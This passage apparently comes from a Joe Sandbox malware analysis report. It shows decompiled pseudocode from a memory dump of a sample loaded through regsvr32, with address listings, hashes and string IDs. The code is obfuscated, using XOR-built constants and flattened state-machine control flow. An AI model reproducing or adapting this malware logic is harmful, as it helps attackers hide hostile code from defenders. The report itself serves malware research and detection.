				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _t249;
				void* _t251;
				void* _t253;
				signed int _t255;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t284;
				signed int _t287;
				void* _t288;
				void* _t290;
				void* _t295;

				_v580 = 0x4bfe6e;
				asm("stosd");
				_t257 = 0;
				_t259 = 0x51;
				asm("stosd");
				_t288 = 0x7c0e6ed;
				asm("stosd");
				_v628 = 0x943dcb;
				_v628 = _v628 / _t259;
				_v628 = _v628 + 0xfffff572;
				_v628 = _v628 ^ 0x0001c976;
				_v652 = 0x585185;
				_t260 = 0x52;
				_v652 = _v652 / _t260;
				_t261 = 0x7a;
				_v652 = _v652 * 0x30;
				_v652 = _v652 << 3;
				_v652 = _v652 ^ 0x019d9581;
				_v620 = 0x8e37d2;
				_v620 = _v620 / _t261;
				_t262 = 0xa;
				_v620 = _v620 / _t262;
				_v620 = _v620 ^ 0x00001dd4;
				_v640 = 0xebfcbd;
				_t263 = 0x37;
				_v640 = _v640 / _t263;
				_v640 = _v640 ^ 0x411fbc08;
				_v640 = _v640 ^ 0x411a10cf;
				_v660 = 0x4be58e;
				_v660 = _v660 >> 0xb;
				_v660 = _v660 + 0xffffb1c4;
				_t264 = 6;
				_v660 = _v660 / _t264;
				_v660 = _v660 ^ 0x2aa1171b;
				_v644 = 0xd2a2f8;
				_v644 = _v644 << 4;
				_v644 = _v644 << 0xa;
				_v644 = _v644 ^ 0xa8b68ca4;
				_v664 = 0x5a4bde;
				_v664 = _v664 + 0xffffb5eb;
				_v664 = _v664 + 0xe53f;
				_v664 = _v664 + 0x5924;
				_v664 = _v664 ^ 0x005ba612;
				_v608 = 0x7d929e;
				_v608 = _v608 << 3;
				_v608 = _v608 ^ 0x03e48f26;
				_v672 = 0x930377;
				_v672 = _v672 * 0x7b;
				_v672 = _v672 | 0x5ffbfbde;
				_v672 = _v672 ^ 0x5ff4a673;
				_v600 = 0xe93e8d;
				_v600 = _v600 >> 6;
				_v600 = _v600 ^ 0x00035072;
				_v596 = 0x8bae1;
				_v596 = _v596 + 0x651f;
				_v596 = _v596 ^ 0x000c8a01;
				_v680 = 0x4044e2;
				_v680 = _v680 | 0x147b8f95;
				_t265 = 0x2f;
				_t287 = _v608;
				_v680 = _v680 / _t265;
				_v680 = _v680 ^ 0x0bafe04b;
				_v680 = _v680 ^ 0x0bc26967;
				_v668 = 0x26c565;
				_v668 = _v668 << 9;
				_v668 = _v668 + 0x3a75;
				_v668 = _v668 | 0xf69dce84;
				_v668 = _v668 ^ 0xff978a4f;
				_v604 = 0xd2ae2f;
				_v604 = _v604 + 0xc6b0;
				_v604 = _v604 ^ 0x00d55143;
				_v632 = 0xdd9fc6;
				_v632 = _v632 >> 1;
				_v632 = _v632 * 0x18;
				_v632 = _v632 ^ 0x0a65bd45;
				_v624 = 0x914ed;
				_v624 = _v624 >> 0xa;
				_v624 = _v624 + 0xe549;
				_v624 = _v624 ^ 0x00003b1e;
				_v676 = 0x2eb381;
				_v676 = _v676 + 0x213e;
				_v676 = _v676 >> 0xe;
				_v676 = _v676 + 0xffffaa21;
				_v676 = _v676 ^ 0xfff8482c;
				_v616 = 0x2a8bc4;
				_v616 = _v616 + 0xffff2eab;
				_v616 = _v616 * 0x1d;
				_v616 = _v616 ^ 0x04b3354b;
				_v592 = 0xc6c06c;
				_v592 = _v592 << 0xb;
				_v592 = _v592 ^ 0x360c8b3f;
				_v636 = 0x8b5b84;
				_v636 = _v636 ^ 0xd3871808;
				_v636 = _v636 | 0x4157d7c1;
				_v636 = _v636 ^ 0xd35c8dff;
				_v648 = 0xa7ae0f;
				_v648 = _v648 + 0xffffb3c1;
				_v648 = _v648 | 0x5fef3d7f;
				_v648 = _v648 ^ 0x5fee6a41;
				_v656 = 0xb088b2;
				_v656 = _v656 ^ 0x94592e7b;
				_v656 = _v656 | 0x9c735a00;
				_v656 = _v656 << 0x10;
				_v656 = _v656 ^ 0xfec44322;
				_v612 = 0xcc869e;
				_v612 = _v612 + 0x2431;
				_v612 = _v612 >> 9;
				_v612 = _v612 ^ 0x0007bc38;
				do {
					while(_t288 != 0xa972cf) {
						if(_t288 == 0xb1903e) {
							_t284 = _v664;
							_t249 = E001BA50A(_t284, _v620, _v608, _v672, _t257, _v600, _v596, _v628, _t265, _v680, _v652, _v668,  &_v524); // executed
							_t287 = _t249;
							_t295 = _t295 + 0x30;
							__eflags = _t287 - 0xffffffff;
							if(__eflags == 0) {
								L20:
								return _t257;
							}
							_t288 = 0xe5e92a7;
							continue;
						}
						if(_t288 == 0x4e98f9f) {
							_t251 = E001A2221(_t265);
							_t290 = _v588 - _v548;
							asm("sbb ecx, [esp+0x9c]");
							__eflags = _v584 - _t284;
							if(__eflags < 0) {
								goto L20;
							}
							if(__eflags > 0) {
								L19:
								_t257 = 1;
								__eflags = 1;
								goto L20;
							}
							__eflags = _t290 - _t251;
							if(_t290 < _t251) {
								goto L20;
							}
							goto L19;
						}
						if(_t288 == 0x7c0e6ed) {
							_t288 = 0xaab6d15;
							continue;
						}
						if(_t288 == 0xaab6d15) {
							_t284 = _v660;
							_t265 = _v640;
							_t253 = E001C0575(_v640, _t284, __eflags, _v640,  &_v524, _v644);
							_t295 = _t295 + 0xc;
							__eflags = _t253;
							if(__eflags == 0) {
								goto L20;
							}
							_t288 = 0xb1903e;
							continue;
						}
						if(_t288 == 0xe5e92a7) {
							_t255 = E001B91CC(_t287, _v604, _t265, _v632, _v624,  &_v564, _t265, _v676);
							_t265 = _t287;
							_t284 = _v616;
							asm("sbb esi, esi");
							_t288 = ( ~_t255 & 0xf11d3c16) + 0xf8c36b9; // executed
							E001B02D8(_t287, _t284, _v592, _v636); // executed
							_t295 = _t295 + 0x20;
						}
						goto L14;
					}
					_t222 =  &_v656; // 0x5fee6a41
					_t284 =  *_t222;
					E001C2545(_v648, _t284, _v612,  &_v588);
					_pop(_t265);
					_t288 = 0x4e98f9f;
					L14:
				} while (_t288 != 0xf8c36b9);
				goto L20;
			}

















































                                                                                                                0x001c0e80
                                                                                                                0x001c0e94
                                                                                                                0x001c0e95
                                                                                                                0x001c0e99
                                                                                                                0x001c0e9c
                                                                                                                0x001c0e9d
                                                                                                                0x001c0ea2
                                                                                                                0x001c0ea3
                                                                                                                0x001c0eb3
                                                                                                                0x001c0eb7
                                                                                                                0x001c0ebf
                                                                                                                0x001c0ec7
                                                                                                                0x001c0ed3
                                                                                                                0x001c0ed8
                                                                                                                0x001c0ee3
                                                                                                                0x001c0ee6
                                                                                                                0x001c0eea
                                                                                                                0x001c0eef
                                                                                                                0x001c0ef7
                                                                                                                0x001c0f07
                                                                                                                0x001c0f0f
                                                                                                                0x001c0f14
                                                                                                                0x001c0f1a
                                                                                                                0x001c0f22
                                                                                                                0x001c0f2e
                                                                                                                0x001c0f33
                                                                                                                0x001c0f39
                                                                                                                0x001c0f41
                                                                                                                0x001c0f49
                                                                                                                0x001c0f51
                                                                                                                0x001c0f56
                                                                                                                0x001c0f62
                                                                                                                0x001c0f65
                                                                                                                0x001c0f69
                                                                                                                0x001c0f71
                                                                                                                0x001c0f79
                                                                                                                0x001c0f7e
                                                                                                                0x001c0f83
                                                                                                                0x001c0f8b
                                                                                                                0x001c0f93
                                                                                                                0x001c0f9b
                                                                                                                0x001c0fa3
                                                                                                                0x001c0fab
                                                                                                                0x001c0fb3
                                                                                                                0x001c0fbb
                                                                                                                0x001c0fc0
                                                                                                                0x001c0fc8
                                                                                                                0x001c0fd5
                                                                                                                0x001c0fd9
                                                                                                                0x001c0fe1
                                                                                                                0x001c0feb
                                                                                                                0x001c0ff8
                                                                                                                0x001c0ffd
                                                                                                                0x001c1005
                                                                                                                0x001c100d
                                                                                                                0x001c1015
                                                                                                                0x001c101d
                                                                                                                0x001c1025
                                                                                                                0x001c1033
                                                                                                                0x001c1036
                                                                                                                0x001c103a
                                                                                                                0x001c103e
                                                                                                                0x001c1046
                                                                                                                0x001c104e
                                                                                                                0x001c1056
                                                                                                                0x001c105b
                                                                                                                0x001c1063
                                                                                                                0x001c106b
                                                                                                                0x001c1073
                                                                                                                0x001c107b
                                                                                                                0x001c1083
                                                                                                                0x001c108b
                                                                                                                0x001c1093
                                                                                                                0x001c109c
                                                                                                                0x001c10a0
                                                                                                                0x001c10a8
                                                                                                                0x001c10b0
                                                                                                                0x001c10b5
                                                                                                                0x001c10bd
                                                                                                                0x001c10c5
                                                                                                                0x001c10cd
                                                                                                                0x001c10d5
                                                                                                                0x001c10da
                                                                                                                0x001c10e2
                                                                                                                0x001c10ea
                                                                                                                0x001c10f2
                                                                                                                0x001c10ff
                                                                                                                0x001c1103
                                                                                                                0x001c110b
                                                                                                                0x001c1113
                                                                                                                0x001c1118
                                                                                                                0x001c1120
                                                                                                                0x001c1128
                                                                                                                0x001c1130
                                                                                                                0x001c1138
                                                                                                                0x001c1140
                                                                                                                0x001c1148
                                                                                                                0x001c1150
                                                                                                                0x001c1158
                                                                                                                0x001c1160
                                                                                                                0x001c1168
                                                                                                                0x001c1170
                                                                                                                0x001c1178
                                                                                                                0x001c117d
                                                                                                                0x001c1185
                                                                                                                0x001c118d
                                                                                                                0x001c1195
                                                                                                                0x001c119a
                                                                                                                0x001c11a2
                                                                                                                0x001c11a2
                                                                                                                0x001c11b0
                                                                                                                0x001c12a0
                                                                                                                0x001c12a4
                                                                                                                0x001c12a9
                                                                                                                0x001c12ab
                                                                                                                0x001c12ae
                                                                                                                0x001c12b1
                                                                                                                0x001c1313
                                                                                                                0x001c131c
                                                                                                                0x001c131c
                                                                                                                0x001c12b3
                                                                                                                0x00000000
                                                                                                                0x001c12b3
                                                                                                                0x001c11bc
                                                                                                                0x001c12e8
                                                                                                                0x001c12f1
                                                                                                                0x001c12fc
                                                                                                                0x001c1303
                                                                                                                0x001c1305
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c1307
                                                                                                                0x001c130d
                                                                                                                0x001c130f
                                                                                                                0x001c130f
                                                                                                                0x00000000
                                                                                                                0x001c130f
                                                                                                                0x001c1309
                                                                                                                0x001c130b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c130b
                                                                                                                0x001c11c8
                                                                                                                0x001c125f
                                                                                                                0x00000000
                                                                                                                0x001c125f
                                                                                                                0x001c11d4
                                                                                                                0x001c1237
                                                                                                                0x001c1244
                                                                                                                0x001c1248
                                                                                                                0x001c124d
                                                                                                                0x001c1250
                                                                                                                0x001c1252
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c1258
                                                                                                                0x00000000
                                                                                                                0x001c1258
                                                                                                                0x001c11dc
                                                                                                                0x001c11fe
                                                                                                                0x001c1209
                                                                                                                0x001c1212
                                                                                                                0x001c1218
                                                                                                                0x001c1220
                                                                                                                0x001c1226
                                                                                                                0x001c122b
                                                                                                                0x001c122b
                                                                                                                0x00000000
                                                                                                                0x001c11dc
                                                                                                                0x001c12c6
                                                                                                                0x001c12c6
                                                                                                                0x001c12ce
                                                                                                                0x001c12d4
                                                                                                                0x001c12d5
                                                                                                                0x001c12da
                                                                                                                0x001c12da
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $Y$1$$>!$Aj_$I$u:$D@
                                                                                                                • API String ID: 0-228290010
                                                                                                                • Opcode ID: 4bac98933db578142025bd5de0b79407f17bba23569f3914af7c11532390db40
                                                                                                                • Instruction ID: a93f49f6b139ff50844830b3aa504acf3f753ec6fe5f17f53d692ac93af5b969
                                                                                                                • Opcode Fuzzy Hash: 4bac98933db578142025bd5de0b79407f17bba23569f3914af7c11532390db40
                                                                                                                • Instruction Fuzzy Hash: 58B160B28083809FD368CF65C98A95BFBE2BBD5718F108A1CF59596260D3B5C9098F43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BFECB Relevance: 7.8, Strings: 6, Instructions: 306COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 553 1bfecb-1c0394 call 1ac98a 556 1c039c-1c039e 553->556 557 1c03a4-1c03aa 556->557 558 1c0521-1c0547 call 1b4e54 556->558 560 1c048b-1c051c call 1bf5d9 call 1c224c call 1bf94b 557->560 561 1c03b0-1c03b6 557->561 562 1c054c-1c0557 558->562 582 1c0484-1c0486 560->582 564 1c03b8-1c03be 561->564 565 1c03f6-1c0481 call 1bf5d9 call 1ad467 call 1bf94b 561->565 567 1c055c-1c0562 562->567 564->567 569 1c03c4-1c03f4 call 1a3466 564->569 565->582 567->556 571 1c0568-1c0574 567->571 569->556 582->556
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001BFECB(void* __ecx, intOrPtr _a4) {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				void* _t302;
				void* _t324;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t329;
				void* _t333;
				intOrPtr _t336;
				intOrPtr _t338;
				void* _t347;
				intOrPtr _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int* _t389;

				_push(_a4);
				_push(0);
				_push(__ecx);
				E001AC98A(_t302);
				_v1056 = 0x99f1aa;
				_t389 =  &(( &_v1204)[3]);
				_v1052 = 0x8701ff;
				_v1048 = 0;
				_t378 = 0;
				_v1044 = 0;
				_t347 = 0xc564c88;
				_v1164 = 0xc039a4;
				_v1164 = _v1164 + 0xffff1059;
				_v1164 = _v1164 >> 0xa;
				_v1164 = _v1164 ^ 0x00002ffb;
				_v1156 = 0xaa2a1c;
				_v1156 = _v1156 | 0xac4eb8d1;
				_v1156 = _v1156 >> 9;
				_v1156 = _v1156 ^ 0x005679db;
				_v1132 = 0xf7dd83;
				_v1132 = _v1132 + 0xffff50f8;
				_v1132 = _v1132 ^ 0x00fc089d;
				_v1176 = 0xb5c700;
				_v1176 = _v1176 << 4;
				_v1176 = _v1176 + 0xbfb1;
				_v1176 = _v1176 ^ 0x0b58c49d;
				_v1124 = 0x35efdf;
				_v1124 = _v1124 + 0xffff7781;
				_v1124 = _v1124 ^ 0x00315ebe;
				_v1200 = 0x2f7af8;
				_t379 = 0x28;
				_v1200 = _v1200 * 0x7f;
				_v1200 = _v1200 ^ 0x8956e2bd;
				_v1200 = _v1200 + 0xffff0d53;
				_v1200 = _v1200 ^ 0x9edf5615;
				_v1172 = 0x66383;
				_v1172 = _v1172 | 0xa3718ef9;
				_v1172 = _v1172 >> 1;
				_v1172 = _v1172 ^ 0x51b9cd0e;
				_v1184 = 0x12b320;
				_v1184 = _v1184 / _t379;
				_v1184 = _v1184 >> 3;
				_v1184 = _v1184 ^ 0x868f222a;
				_v1184 = _v1184 ^ 0x8687ae68;
				_v1148 = 0xfbe844;
				_v1148 = _v1148 + 0xffff1a0d;
				_v1148 = _v1148 ^ 0xc848fe34;
				_v1148 = _v1148 ^ 0xc8bbdde4;
				_v1068 = 0x71037b;
				_v1068 = _v1068 | 0x53037419;
				_v1068 = _v1068 ^ 0x5379ba89;
				_v1116 = 0xd0f175;
				_v1116 = _v1116 << 2;
				_v1116 = _v1116 ^ 0x0347dcc0;
				_v1084 = 0x5e84e5;
				_v1084 = _v1084 | 0xaea73dae;
				_v1084 = _v1084 ^ 0xaefdc12b;
				_v1140 = 0xa17ac3;
				_v1140 = _v1140 ^ 0xd2076937;
				_v1140 = _v1140 ^ 0xd2af841d;
				_v1160 = 0xf1f8ae;
				_v1160 = _v1160 * 0x33;
				_v1160 = _v1160 ^ 0x9d2c5a39;
				_v1160 = _v1160 ^ 0xad137846;
				_v1192 = 0x93e357;
				_v1192 = _v1192 | 0x5f8ce43c;
				_v1192 = _v1192 ^ 0xfdb5c039;
				_v1192 = _v1192 >> 9;
				_v1192 = _v1192 ^ 0x005c06f0;
				_v1168 = 0x121292;
				_v1168 = _v1168 ^ 0xcdaf1c48;
				_v1168 = _v1168 >> 0xf;
				_v1168 = _v1168 ^ 0x0005297f;
				_v1076 = 0x35300b;
				_t380 = 0x24;
				_v1076 = _v1076 * 0x36;
				_v1076 = _v1076 ^ 0x0b31a6d2;
				_v1108 = 0xaabbde;
				_v1108 = _v1108 / _t380;
				_v1108 = _v1108 ^ 0x000dc4c6;
				_v1060 = 0xe746e7;
				_v1060 = _v1060 + 0xddd0;
				_v1060 = _v1060 ^ 0x00ebb1cd;
				_v1204 = 0x1bfeae;
				_t381 = 0x60;
				_v1204 = _v1204 / _t381;
				_v1204 = _v1204 | 0x6dffdf7c;
				_v1204 = _v1204 ^ 0x6df2c332;
				_v1092 = 0x337b21;
				_t147 =  &_v1092; // 0x337b21
				_t382 = 0x55;
				_v1092 =  *_t147 * 0x44;
				_v1092 = _v1092 ^ 0x0dae2e10;
				_v1064 = 0x6d6ee7;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x36bedcee;
				_v1100 = 0x380160;
				_v1100 = _v1100 << 2;
				_v1100 = _v1100 ^ 0x00e51ec2;
				_v1196 = 0xf78bf4;
				_v1196 = _v1196 ^ 0x3990821c;
				_v1196 = _v1196 / _t382;
				_v1196 = _v1196 << 0xe;
				_v1196 = _v1196 ^ 0x3876bd87;
				_v1120 = 0xec6407;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 ^ 0x003a352f;
				_v1180 = 0x6d7f05;
				_v1180 = _v1180 ^ 0x64a045e7;
				_t383 = 0x5c;
				_v1180 = _v1180 * 0x36;
				_v1180 = _v1180 << 1;
				_v1180 = _v1180 ^ 0x8696e2e4;
				_v1128 = 0x945e36;
				_v1128 = _v1128 | 0x8dbb4251;
				_v1128 = _v1128 ^ 0x8db3d187;
				_v1188 = 0xca501a;
				_v1188 = _v1188 / _t383;
				_v1188 = _v1188 * 0x16;
				_v1188 = _v1188 | 0x13b8981e;
				_v1188 = _v1188 ^ 0x13b71f6c;
				_v1136 = 0x61c6d1;
				_v1136 = _v1136 + 0xe841;
				_v1136 = _v1136 ^ 0x00601ade;
				_v1104 = 0x5d035a;
				_v1104 = _v1104 << 0xf;
				_v1104 = _v1104 ^ 0x81a8b5c6;
				_v1144 = 0x8f9944;
				_v1144 = _v1144 | 0xdee19e20;
				_t384 = 0x3c;
				_v1144 = _v1144 / _t384;
				_v1144 = _v1144 ^ 0x03b004e7;
				_v1112 = 0x412e10;
				_v1112 = _v1112 | 0x1ab18f6f;
				_v1112 = _v1112 ^ 0x1af3d5bd;
				_v1152 = 0xaf613c;
				_v1152 = _v1152 + 0xfb85;
				_v1152 = _v1152 | 0xe6439941;
				_v1152 = _v1152 ^ 0xe6f7183d;
				_v1072 = 0xe2848b;
				_v1072 = _v1072 >> 2;
				_v1072 = _v1072 ^ 0x00367d60;
				_v1080 = 0xf0f251;
				_v1080 = _v1080 * 0x6a;
				_v1080 = _v1080 ^ 0x63cdbe63;
				_v1088 = 0x7c1c45;
				_v1088 = _v1088 | 0x67884939;
				_v1088 = _v1088 ^ 0x67ffa2cf;
				_v1096 = 0x6bc56e;
				_v1096 = _v1096 + 0xf15f;
				_v1096 = _v1096 ^ 0x0061c90b;
				while(_t347 != 0xd93bea) {
					if(_t347 == 0xf67f27) {
						_push(_v1196);
						_push(0x1a114c);
						_push(_v1100);
						_t325 = E001BF5D9(_v1092, _v1064, __eflags);
						_t326 =  *0x1c4c10; // 0x67d820
						_t329 =  *0x1c4c10; // 0x67d820
						E001C224C(_v1120, __eflags, _t329 + 0x20c,  &_v1040, _v1180, _v1128, 0, _t325, 0x104, _v1188, _v1136, _t326 + 4);
						E001BF94B(_t325, _v1104, _v1144, _v1112, _v1152);
						_t389 =  &(_t389[0x10]);
						goto L7;
					} else {
						if(_t347 == 0xa2728a4) {
							_push(_v1068);
							_push(0x1a10bc);
							_push(_v1148);
							_t333 = E001BF5D9(_v1172, _v1184, __eflags);
							_t336 =  *0x1c4c10; // 0x67d820
							_t338 =  *0x1c4c10; // 0x67d820
							__eflags = _t338 + 4;
							E001AD467(_v1084, _t338 + 4, _v1140, _t338 + 4, _v1172, _v1160, _t336 + 0x20c, _v1192, _t333,  &_v520,  &_v1040, _v1168);
							E001BF94B(_t333, _v1076, _v1108, _v1060, _v1204);
							_t389 =  &(_t389[0x10]);
							L7:
							_t347 = 0xd93bea;
							continue;
						} else {
							if(_t347 == 0xc564c88) {
								_t263 =  &_v1132; // 0x3a352f
								E001A3466(_v1164, _v1156, _t347, _t347,  &_v1040,  *_t263, _t347, _v1176, _v1124, _v1200);
								_t389 =  &(_t389[8]);
								_t347 = 0xa2728a4;
								continue;
							}
						}
					}
					L10:
					__eflags = _t347 - 0x1f211b4;
					if(__eflags != 0) {
						continue;
					}
					return _t378;
				}
				_t324 = E001B4E54(_v1072, 0, __eflags,  &_v520, 0, _v1080, 0, _v1088, _t347, _v1096); // executed
				_t389 =  &(_t389[7]);
				__eflags = _t324;
				_t378 =  !=  ? 1 : _t378;
				_t347 = 0x1f211b4;
				goto L10;
			}































































                                                                                                                0x001bfed5
                                                                                                                0x001bfede
                                                                                                                0x001bfedf
                                                                                                                0x001bfee0
                                                                                                                0x001bfee5
                                                                                                                0x001bfef0
                                                                                                                0x001bfef3
                                                                                                                0x001bff00
                                                                                                                0x001bff07
                                                                                                                0x001bff09
                                                                                                                0x001bff10
                                                                                                                0x001bff15
                                                                                                                0x001bff1d
                                                                                                                0x001bff25
                                                                                                                0x001bff2a
                                                                                                                0x001bff32
                                                                                                                0x001bff3a
                                                                                                                0x001bff42
                                                                                                                0x001bff47
                                                                                                                0x001bff4f
                                                                                                                0x001bff57
                                                                                                                0x001bff5f
                                                                                                                0x001bff67
                                                                                                                0x001bff6f
                                                                                                                0x001bff74
                                                                                                                0x001bff7c
                                                                                                                0x001bff84
                                                                                                                0x001bff8c
                                                                                                                0x001bff94
                                                                                                                0x001bff9c
                                                                                                                0x001bffab
                                                                                                                0x001bffac
                                                                                                                0x001bffb0
                                                                                                                0x001bffb8
                                                                                                                0x001bffc0
                                                                                                                0x001bffc8
                                                                                                                0x001bffd0
                                                                                                                0x001bffd8
                                                                                                                0x001bffdc
                                                                                                                0x001bffe4
                                                                                                                0x001bfff2
                                                                                                                0x001bfff6
                                                                                                                0x001bfffb
                                                                                                                0x001c0003
                                                                                                                0x001c000b
                                                                                                                0x001c0013
                                                                                                                0x001c001b
                                                                                                                0x001c0023
                                                                                                                0x001c002b
                                                                                                                0x001c0036
                                                                                                                0x001c0041
                                                                                                                0x001c004c
                                                                                                                0x001c0054
                                                                                                                0x001c0059
                                                                                                                0x001c0061
                                                                                                                0x001c006c
                                                                                                                0x001c0077
                                                                                                                0x001c0082
                                                                                                                0x001c008a
                                                                                                                0x001c0092
                                                                                                                0x001c009a
                                                                                                                0x001c00a7
                                                                                                                0x001c00ab
                                                                                                                0x001c00b3
                                                                                                                0x001c00bb
                                                                                                                0x001c00c3
                                                                                                                0x001c00cb
                                                                                                                0x001c00d3
                                                                                                                0x001c00d8
                                                                                                                0x001c00e0
                                                                                                                0x001c00e8
                                                                                                                0x001c00f2
                                                                                                                0x001c00f7
                                                                                                                0x001c00ff
                                                                                                                0x001c0114
                                                                                                                0x001c0117
                                                                                                                0x001c011e
                                                                                                                0x001c0129
                                                                                                                0x001c0139
                                                                                                                0x001c013d
                                                                                                                0x001c0145
                                                                                                                0x001c0150
                                                                                                                0x001c015b
                                                                                                                0x001c0166
                                                                                                                0x001c0172
                                                                                                                0x001c0177
                                                                                                                0x001c017d
                                                                                                                0x001c0185
                                                                                                                0x001c018d
                                                                                                                0x001c0198
                                                                                                                0x001c01a0
                                                                                                                0x001c01a3
                                                                                                                0x001c01aa
                                                                                                                0x001c01b5
                                                                                                                0x001c01c0
                                                                                                                0x001c01c8
                                                                                                                0x001c01d3
                                                                                                                0x001c01db
                                                                                                                0x001c01e0
                                                                                                                0x001c01e8
                                                                                                                0x001c01f0
                                                                                                                0x001c0200
                                                                                                                0x001c0204
                                                                                                                0x001c0209
                                                                                                                0x001c0211
                                                                                                                0x001c0219
                                                                                                                0x001c021e
                                                                                                                0x001c0226
                                                                                                                0x001c022e
                                                                                                                0x001c023b
                                                                                                                0x001c023e
                                                                                                                0x001c0242
                                                                                                                0x001c0246
                                                                                                                0x001c024e
                                                                                                                0x001c0256
                                                                                                                0x001c025e
                                                                                                                0x001c0266
                                                                                                                0x001c0274
                                                                                                                0x001c027d
                                                                                                                0x001c0281
                                                                                                                0x001c0289
                                                                                                                0x001c0291
                                                                                                                0x001c0299
                                                                                                                0x001c02a1
                                                                                                                0x001c02a9
                                                                                                                0x001c02b1
                                                                                                                0x001c02b6
                                                                                                                0x001c02be
                                                                                                                0x001c02c6
                                                                                                                0x001c02d4
                                                                                                                0x001c02dc
                                                                                                                0x001c02e0
                                                                                                                0x001c02e8
                                                                                                                0x001c02f0
                                                                                                                0x001c02f8
                                                                                                                0x001c0300
                                                                                                                0x001c0308
                                                                                                                0x001c0310
                                                                                                                0x001c0318
                                                                                                                0x001c0320
                                                                                                                0x001c032b
                                                                                                                0x001c0333
                                                                                                                0x001c033e
                                                                                                                0x001c0351
                                                                                                                0x001c0358
                                                                                                                0x001c0363
                                                                                                                0x001c036e
                                                                                                                0x001c0379
                                                                                                                0x001c0384
                                                                                                                0x001c038c
                                                                                                                0x001c0394
                                                                                                                0x001c039c
                                                                                                                0x001c03aa
                                                                                                                0x001c048b
                                                                                                                0x001c048f
                                                                                                                0x001c0494
                                                                                                                0x001c04a9
                                                                                                                0x001c04b7
                                                                                                                0x001c04e9
                                                                                                                0x001c04f4
                                                                                                                0x001c0514
                                                                                                                0x001c0519
                                                                                                                0x00000000
                                                                                                                0x001c03b0
                                                                                                                0x001c03b6
                                                                                                                0x001c03f6
                                                                                                                0x001c03fd
                                                                                                                0x001c0402
                                                                                                                0x001c040e
                                                                                                                0x001c0431
                                                                                                                0x001c0440
                                                                                                                0x001c0446
                                                                                                                0x001c045c
                                                                                                                0x001c047c
                                                                                                                0x001c0481
                                                                                                                0x001c0484
                                                                                                                0x001c0484
                                                                                                                0x00000000
                                                                                                                0x001c03b8
                                                                                                                0x001c03be
                                                                                                                0x001c03d8
                                                                                                                0x001c03e7
                                                                                                                0x001c03ec
                                                                                                                0x001c03ef
                                                                                                                0x00000000
                                                                                                                0x001c03ef
                                                                                                                0x001c03be
                                                                                                                0x001c03b6
                                                                                                                0x001c055c
                                                                                                                0x001c055c
                                                                                                                0x001c0562
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0574
                                                                                                                0x001c0574
                                                                                                                0x001c0547
                                                                                                                0x001c054e
                                                                                                                0x001c0552
                                                                                                                0x001c0554
                                                                                                                0x001c0557
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !{3$/5:$A$`}6$F$nm
                                                                                                                • API String ID: 0-387362328
                                                                                                                • Opcode ID: 9eb0974d5bf3201c5978d6bac67d8f7caa8b08458dc87043ec3661be237ecdac
                                                                                                                • Instruction ID: c3f381614f46ecb9ff534d8c3c976f84a46fd74edfac6333589299588d7d5da0
                                                                                                                • Opcode Fuzzy Hash: 9eb0974d5bf3201c5978d6bac67d8f7caa8b08458dc87043ec3661be237ecdac
                                                                                                                • Instruction Fuzzy Hash: CFF101B1109380DFD368CF66C94AA9BBBE1FBC4758F10891DF19A96260C7B18949DF43
                                                                                                                Uniqueness

